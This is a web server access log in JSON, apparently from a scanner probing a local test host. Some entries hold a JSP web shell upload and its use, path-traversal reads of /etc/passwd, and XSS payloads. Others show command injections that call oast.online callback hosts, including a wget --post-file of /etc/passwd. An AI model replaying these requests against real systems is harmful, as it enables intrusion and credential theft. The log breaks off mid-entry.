"13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /trace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%\x0D\x0Aif (request.getParameter(\x22cmd\x22) != null) {\x0D\x0A out.println(\x22Command: \x22 + request.getParameter(\x22cmd\x22) + \x22

\x22);\x0D\x0A Process p = Runtime.getRuntime().exec(request.getParameter(\x22cmd\x22));\x0D\x0A OutputStream os = p.getOutputStream();\x0D\x0A InputStream in = p.getInputStream();\x0D\x0A DataInputStream dis = new DataInputStream(in);\x0D\x0A String disr = dis.readLine();\x0D\x0A while ( disr != null ) {\x0D\x0A out.println(disr);\x0D\x0A disr = dis.readLine();\x0D\x0A }\x0D\x0A }\x0D\x0A%>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /poc.jsp/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yarn.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://c9v8gc8smpv8b0ng0t001er5wds66wosq.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=297MFlh5WbA37nuZF4Eq9638elr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/networking/get_netcfg.php?iface=;curl%20http://c9v8gc8smpv8b0ng0t00dz9js44gcizo1.oast.online/`whoami`; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A c9v8gc8smpv8b0ng0t00t9ke3pqfk88jy.oast.online\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /struts2-rest-showcase/orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lfm.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/luci HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"{\x22id\x22:\x22insecure-firebase-database\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /297MFgGASlE4nRMmRldJxfsWo7c.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", 